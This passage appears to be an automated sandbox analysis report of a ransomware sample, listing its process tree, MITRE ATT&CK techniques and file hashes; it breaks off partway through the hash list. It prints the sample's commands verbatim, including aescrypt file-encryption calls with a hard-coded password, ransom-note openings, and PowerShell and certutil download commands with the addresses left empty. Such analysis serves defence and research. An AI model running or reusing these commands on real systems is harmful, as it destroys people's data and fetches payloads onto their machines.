C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "UnblockUninstall.ADTS.lck" "UnblockUninstall.ADTS"
3⤵
PID:2372

C:\Windows\system32\attrib.exe
attrib +r "UnblockUninstall.ADTS.lck"
3⤵
PID:4724

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "UnpublishFind.sql.lck" "UnpublishFind.sql"
3⤵
PID:4404

C:\Windows\system32\attrib.exe
attrib +r "UnpublishFind.sql.lck"
3⤵
PID:2932

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "FindTest.TTS.lck" "FindTest.TTS"
3⤵
PID:2572

C:\Windows\system32\attrib.exe
attrib +r "FindTest.TTS.lck"
3⤵
- Views/modifies file attributes
PID:2368

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
3⤵
PID:4384

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "ntuser.dat.LOG2.lck" "ntuser.dat.LOG2"
3⤵
PID:4296

C:\Windows\system32\attrib.exe
attrib +r "ntuser.dat.LOG2.lck"
3⤵
- Views/modifies file attributes
PID:2348

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
3⤵
PID:4808

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
3⤵
PID:756

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "desktop.ini.lck" "desktop.ini"
3⤵
PID:2140

C:\Windows\system32\attrib.exe
attrib +r "desktop.ini.lck"
3⤵
PID:2136

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
3⤵
PID:4360

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "desktop.ini.lck" "desktop.ini"
3⤵
PID:4376

C:\Windows\system32\attrib.exe
attrib +r "desktop.ini.lck"
3⤵
PID:3132

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "Wallpaper.jpg.lck" "Wallpaper.jpg"
3⤵
PID:4340

C:\Windows\system32\attrib.exe
attrib +r "Wallpaper.jpg.lck"
3⤵
PID:4836

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "ResumeStop.cr2.lck" "ResumeStop.cr2"
3⤵
PID:3336

C:\Windows\system32\attrib.exe
attrib +r "ResumeStop.cr2.lck"
3⤵
PID:5096

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "SplitSet.svg.lck" "SplitSet.svg"
3⤵
PID:3384

C:\Windows\system32\attrib.exe
attrib +r "SplitSet.svg.lck"
3⤵
PID:300

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "AssertResume.eps.lck" "AssertResume.eps"
3⤵
PID:4048

C:\Windows\system32\attrib.exe
attrib +r "AssertResume.eps.lck"
3⤵
- Views/modifies file attributes
PID:4068

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "BlockSend.ico.lck" "BlockSend.ico"
3⤵
PID:4448

C:\Windows\system32\attrib.exe
attrib +r "BlockSend.ico.lck"
3⤵
- Views/modifies file attributes
PID:3372

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "ReceivePush.gif.lck" "ReceivePush.gif"
3⤵
PID:1960

C:\Windows\system32\attrib.exe
attrib +r "ReceivePush.gif.lck"
3⤵
PID:520

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "UnblockMove.jpeg.lck" "UnblockMove.jpeg"
3⤵
PID:4080

C:\Windows\system32\attrib.exe
attrib +r "UnblockMove.jpeg.lck"
3⤵
PID:4580

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "OpenFind.dib.lck" "OpenFind.dib"
3⤵
PID:4564

C:\Windows\system32\attrib.exe
attrib +r "OpenFind.dib.lck"
3⤵
PID:4600

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "CompleteUnblock.dxf.lck" "CompleteUnblock.dxf"
3⤵
PID:4540

C:\Windows\system32\attrib.exe
attrib +r "CompleteUnblock.dxf.lck"
3⤵
- Views/modifies file attributes
PID:4544

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "DisablePush.ico.lck" "DisablePush.ico"
3⤵
PID:1504

C:\Windows\system32\attrib.exe
attrib +r "DisablePush.ico.lck"
3⤵
- Views/modifies file attributes
PID:1184

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "OutRegister.wmf.lck" "OutRegister.wmf"
3⤵
PID:992

C:\Windows\system32\attrib.exe
attrib +r "OutRegister.wmf.lck"
3⤵
- Views/modifies file attributes
PID:1520

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "ConvertToApprove.gif.lck" "ConvertToApprove.gif"
3⤵
PID:1784

C:\Windows\system32\attrib.exe
attrib +r "ConvertToApprove.gif.lck"
3⤵
- Views/modifies file attributes
PID:4372

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "MergeCheckpoint.dxf.lck" "MergeCheckpoint.dxf"
3⤵
PID:1820

C:\Windows\system32\attrib.exe
attrib +r "MergeCheckpoint.dxf.lck"
3⤵
PID:224

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
3⤵
PID:2356

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
3⤵
PID:2980

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
3⤵
PID:2552

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "ntuser.dat.LOG2.lck" "ntuser.dat.LOG2"
3⤵
PID:4728

C:\Windows\system32\attrib.exe
attrib +r "ntuser.dat.LOG2.lck"
3⤵
- Views/modifies file attributes
PID:4744

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
3⤵
PID:2692

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "Everywhere.search-ms.lck" "Everywhere.search-ms"
3⤵
PID:4732

C:\Windows\system32\attrib.exe
attrib +r "Everywhere.search-ms.lck"
3⤵
PID:4420

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "Indexed.lck" "Indexed"
3⤵
PID:2216

C:\Windows\system32\attrib.exe
attrib +r "Indexed.lck"
3⤵
PID:4384

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "desktop.ini.lck" "desktop.ini"
3⤵
PID:2196

C:\Windows\system32\attrib.exe
attrib +r "desktop.ini.lck"
3⤵
PID:2224

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "winrt--{S-1-5-21-3341490333-719741536-2920803124-1000}-.searchconnector-ms.lck" "winrt--{S-1-5-21-3341490333-719741536-2920803124-1000}-.searchconnector-ms"
3⤵
PID:4696

C:\Windows\system32\attrib.exe
attrib +r "winrt--{S-1-5-21-3341490333-719741536-2920803124-1000}-.searchconnector-ms.lck"
3⤵
PID:4808

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
3⤵
PID:3392

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
3⤵
PID:4928

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "ntuser.dat.LOG2.lck" "ntuser.dat.LOG2"
3⤵
PID:2136

C:\Windows\system32\attrib.exe
attrib +r "ntuser.dat.LOG2.lck"
3⤵
PID:3088

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
3⤵
PID:4356

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
3⤵
PID:4992

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "desktop.ini.lck" "desktop.ini"
3⤵
PID:1620

C:\Windows\system32\attrib.exe
attrib +r "desktop.ini.lck"
3⤵
PID:4836

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -c (new-object System.Net.WebClient).DownloadFile('','')
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2096

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -c Invoke-WebRequest -Uri -OutFile
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4060

C:\Windows\system32\certutil.exe
certutil -urlcache -split -f
3⤵
PID:4832

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
3⤵
PID:1776

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "ntuser.dat.LOG2.lck" "ntuser.dat.LOG2"
3⤵
PID:1644

C:\Windows\system32\attrib.exe
attrib +r "ntuser.dat.LOG2.lck"
3⤵
PID:1876

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /aD /b /oS
3⤵
PID:4364

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
3⤵
PID:2112

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "90737d32e3aba4b.timestamp.lck.lck" "90737d32e3aba4b.timestamp.lck"
3⤵
PID:2176

C:\Windows\system32\attrib.exe
attrib +r "90737d32e3aba4b.timestamp.lck.lck"
3⤵
PID:208

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
3⤵
PID:3904

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
3⤵
PID:188

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "ntuser.dat.LOG2.lck" "ntuser.dat.LOG2"
3⤵
PID:2156

C:\Windows\system32\attrib.exe
attrib +r "ntuser.dat.LOG2.lck"
3⤵
PID:4108

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
3⤵
PID:204

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
3⤵
PID:4420

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
3⤵
PID:4500

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
3⤵
PID:4456

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
3⤵
PID:4756

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
3⤵
PID:2236

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
3⤵
PID:3952

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
3⤵
PID:4680

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "ntuser.dat.LOG2.lck" "ntuser.dat.LOG2"
3⤵
PID:756

C:\Windows\system32\attrib.exe
attrib +r "ntuser.dat.LOG2.lck"
3⤵
PID:4840

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
3⤵
PID:4928

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
3⤵
PID:4320

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "ntuser.dat.LOG2.lck" "ntuser.dat.LOG2"
3⤵
PID:4860

C:\Windows\system32\attrib.exe
attrib +r "ntuser.dat.LOG2.lck"
3⤵
PID:4356

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
3⤵
PID:3248

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
3⤵
PID:712

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
3⤵
PID:4064

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
3⤵
PID:3464

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
3⤵
PID:4256

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
3⤵
PID:5096

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "ntuser.dat.LOG2.lck" "ntuser.dat.LOG2"
3⤵
PID:4848

C:\Windows\system32\attrib.exe
attrib +r "ntuser.dat.LOG2.lck"
3⤵
PID:3032

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
3⤵
PID:4428

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "Indexed.lck" "Indexed"
3⤵
PID:5112

C:\Windows\system32\attrib.exe
attrib +r "Indexed.lck"
3⤵
- Views/modifies file attributes
PID:4900

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
3⤵
PID:4580

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
3⤵
PID:3436

C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "ntuser.dat.LOG2.lck" "ntuser.dat.LOG2"
3⤵
PID:3380

C:\Windows\system32\attrib.exe
attrib +r "ntuser.dat.LOG2.lck"
3⤵
- Views/modifies file attributes
PID:4504

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
3⤵
PID:824

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
3⤵
PID:4040

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -c (new-object System.Net.WebClient).DownloadFile('','')
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4544

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -c Invoke-WebRequest -Uri -OutFile
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2164

C:\Windows\system32\certutil.exe
certutil -urlcache -split -f
3⤵
PID:4108

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4164

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:2628

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\Pay2Decrypt11.txt
1⤵
- Opens file in notepad (likely ransom note)
PID:3236

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\Pay2Decrypt70.txt
1⤵
- Opens file in notepad (likely ransom note)
PID:4248

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Hidden Files and Directories

T1158

Scheduled Task

T1053

Privilege Escalation

Bypass User Account Control

T1088

Scheduled Task

T1053

Defense Evasion

Bypass User Account Control

T1088

Disabling Security Tools

T1089

Modify Registry

T1112

File Deletion

T1107

Hidden Files and Directories

T1158

Credential Access

Credentials in Files

T1081

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
MD5
5d574dc518025fad52b7886c1bff0e13

SHA1
68217a5f9e9a64ca8fed9eefa4171786a8f9f8f7

SHA256
755c4768f6e384030805284ab88689a325431667e9ab11d9aeaa55e9739742f2

SHA512
21de152e07d269b265dae58d46e8c68a3268b2f78d771d4fc44377a14e0c6e73aadae923dcfd34ce2ef53c2eaa53d4df8f281d9b8a627edee213946c9ef37d13

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
402a28d9cb9300d3079c5eb2a786b021

SHA1
c00017be72af373d7a7b41e446c296a495007ba3

SHA256
d957c063fa4b617b682f6cc946dab9f4288a1995952214af6f0bec3d67d2d625

SHA512
6aa7a8bcb781c218f61474b4b57c9febf265990565f5d2427a275e62b08722fc539f8c12cbd4db3f300458d76f7e8ebc237653c4d3cc18c0881e5781cedeaf10

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
3e2592f78607838007959e526cb05dff

SHA1
9c1c3518df8e51394058521a3bcbbcb0ea576322

SHA256
96d01918e610e2f19371100ced0c1624250732e8bc60bb4a8dd039b6f5f15192

SHA512
1b533df7b435cc7e67032657b4ce7f05cd690a913b2375929c5dd5f21b19c21d0b7f07266136359c183c61a304bb4791028baf2ea8ef2c06dd8d3ac93fd8a19a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
6cb381a6aa727f7aa45c5b6ab054cbbc

SHA1
ca05793de0065387b5a64ae32a9cea71504ff5d4

SHA256
dbab219b81fa406327927d3b42dd143a1fd1997a4ee68e427ac609a11161a509

SHA512
26d58d2259bad48ee2514690ca3c0b2368d7338f581c87e45644f5e0d385754041c9e4083fe00a382c7a483489bd7e0480b40f2ecb35b5fb5d9a2b7131abbfbe

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
7412850c4ff29193c23ab32e2143f233

SHA1
de2729b74bd3c7aa64e6bb805a66a616ae4cc81c

SHA256
c4ed73d914c71abf371bb27bc38f17528bf36238afa9c76b00445c09626b480b

SHA512
9d600642daed312a0a0d5509da08d3623b6529303ff9a4c0da7983e4cb9887a42aa2036488bebf7eeb8c495e7a71b1dbc4fb9ec79546c5059f0b12adba861da8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
4ab208b53f7f3bd272b8e0ceaebf1c29

SHA1
6a79703ff5664f9b6f144a91d76e8a3abe62dd6a

SHA256
6a04b7350d742da638d5cc1f02b5fcbbec5590b21ddb74194090866738f2603c

SHA512
29db14022c16b1d67916d40c1790a98314ad70d4ab50386c0c54330fc06934cecd1ef9530fa75815714ece7285d1de8ef8f6e012736cbfae1ade8a5b66044f4f

Download Submit
C:\Users\Admin\AppData\Local\Temp\2754.tmp\2755.tmp\2756.bat
MD5
11467ac4674ce34db17977623463468a

SHA1
fa4d40235edb9f219fe7225d25e55de2c781f4c5

SHA256
9e63f4dc6cd0e9bd04ec464221c057ea37c9517ef812b60dc344f7923d82f329

SHA512
91b65668c5eeda05b685de148a3cb1e7a294cb938e0821fd046f7576ddab93203829e1e71139e3c343b3f007fb9db4632173b052e6b298270e21f9a81e0f6840

Download Submit
C:\Users\Admin\AppData\Local\Temp\2754.tmp\DiscordSendWebhook.exe
MD5
fb7a78f485ec2586c54d60d293dd5352

SHA1
d4e1f1061f7a872f9843e44c7d27d13ba7ef71bb

SHA256
b116ff00546620a598119d6704e9849393d2f9948fc8888d6ddf6211aa5b80b9

SHA512
b6635e849ab96740e5cefef3a874dc58cc26aa18ccc9cca31e61e541c2ddeade7eb59e524fc36df22e0656884733f29d1143ffbf1cdd92fbd636d134d723c3e5

Download Submit
C:\Users\Admin\AppData\Local\Temp\2754.tmp\DiscordSendWebhook.exe
MD5
fb7a78f485ec2586c54d60d293dd5352

SHA1
d4e1f1061f7a872f9843e44c7d27d13ba7ef71bb

SHA256
b116ff00546620a598119d6704e9849393d2f9948fc8888d6ddf6211aa5b80b9

SHA512
b6635e849ab96740e5cefef3a874dc58cc26aa18ccc9cca31e61e541c2ddeade7eb59e524fc36df22e0656884733f29d1143ffbf1cdd92fbd636d134d723c3e5

Download Submit
C:\Users\Admin\AppData\Local\Temp\2754.tmp\DiscordSendWebhook.exe
MD5
fb7a78f485ec2586c54d60d293dd5352

SHA1
d4e1f1061f7a872f9843e44c7d27d13ba7ef71bb

SHA256
b116ff00546620a598119d6704e9849393d2f9948fc8888d6ddf6211aa5b80b9

SHA512
b6635e849ab96740e5cefef3a874dc58cc26aa18ccc9cca31e61e541c2ddeade7eb59e524fc36df22e0656884733f29d1143ffbf1cdd92fbd636d134d723c3e5

Download Submit
C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
MD5
82ff688aa9253b356e5d890ff311b59e

SHA1
4a143fc08b6a55866403966918026509befcc7c1

SHA256
b68fc901d758ba9ea3a5a616abd34d1662197aa31b502f27cbf2579a947e53e9

SHA512
cbb3d81e3237b856e158c5f38f84230a50f913bdada0ef37b679e27e7ddf3c970173b68d2415dd8a7377ba543206bb8e0fe77c61334b47c5684e3ddfff86aced

Download Submit
C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
MD5
82ff688aa9253b356e5d890ff311b59e

SHA1
4a143fc08b6a55866403966918026509befcc7c1

SHA256
b68fc901d758ba9ea3a5a616abd34d1662197aa31b502f27cbf2579a947e53e9

SHA512
cbb3d81e3237b856e158c5f38f84230a50f913bdada0ef37b679e27e7ddf3c970173b68d2415dd8a7377ba543206bb8e0fe77c61334b47c5684e3ddfff86aced

Download Submit
C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
MD5
82ff688aa9253b356e5d890ff311b59e

SHA1
4a143fc08b6a55866403966918026509befcc7c1

SHA256
b68fc901d758ba9ea3a5a616abd34d1662197aa31b502f27cbf2579a947e53e9

SHA512
cbb3d81e3237b856e158c5f38f84230a50f913bdada0ef37b679e27e7ddf3c970173b68d2415dd8a7377ba543206bb8e0fe77c61334b47c5684e3ddfff86aced

Download Submit
C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
MD5
82ff688aa9253b356e5d890ff311b59e

SHA1
4a143fc08b6a55866403966918026509befcc7c1

SHA256
b68fc901d758ba9ea3a5a616abd34d1662197aa31b502f27cbf2579a947e53e9

SHA512
cbb3d81e3237b856e158c5f38f84230a50f913bdada0ef37b679e27e7ddf3c970173b68d2415dd8a7377ba543206bb8e0fe77c61334b47c5684e3ddfff86aced

Download Submit
C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
MD5
82ff688aa9253b356e5d890ff311b59e

SHA1
4a143fc08b6a55866403966918026509befcc7c1

SHA256
b68fc901d758ba9ea3a5a616abd34d1662197aa31b502f27cbf2579a947e53e9

SHA512
cbb3d81e3237b856e158c5f38f84230a50f913bdada0ef37b679e27e7ddf3c970173b68d2415dd8a7377ba543206bb8e0fe77c61334b47c5684e3ddfff86aced

Download Submit
C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
MD5
82ff688aa9253b356e5d890ff311b59e

SHA1
4a143fc08b6a55866403966918026509befcc7c1

SHA256
b68fc901d758ba9ea3a5a616abd34d1662197aa31b502f27cbf2579a947e53e9

SHA512
cbb3d81e3237b856e158c5f38f84230a50f913bdada0ef37b679e27e7ddf3c970173b68d2415dd8a7377ba543206bb8e0fe77c61334b47c5684e3ddfff86aced

Download Submit
C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
MD5
82ff688aa9253b356e5d890ff311b59e

SHA1
4a143fc08b6a55866403966918026509befcc7c1

SHA256
b68fc901d758ba9ea3a5a616abd34d1662197aa31b502f27cbf2579a947e53e9

SHA512
cbb3d81e3237b856e158c5f38f84230a50f913bdada0ef37b679e27e7ddf3c970173b68d2415dd8a7377ba543206bb8e0fe77c61334b47c5684e3ddfff86aced

Download Submit
C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
MD5
82ff688aa9253b356e5d890ff311b59e

SHA1
4a143fc08b6a55866403966918026509befcc7c1

SHA256
b68fc901d758ba9ea3a5a616abd34d1662197aa31b502f27cbf2579a947e53e9

SHA512
cbb3d81e3237b856e158c5f38f84230a50f913bdada0ef37b679e27e7ddf3c970173b68d2415dd8a7377ba543206bb8e0fe77c61334b47c5684e3ddfff86aced

Download Submit
C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
MD5
82ff688aa9253b356e5d890ff311b59e

SHA1
4a143fc08b6a55866403966918026509befcc7c1

SHA256
b68fc901d758ba9ea3a5a616abd34d1662197aa31b502f27cbf2579a947e53e9

SHA512
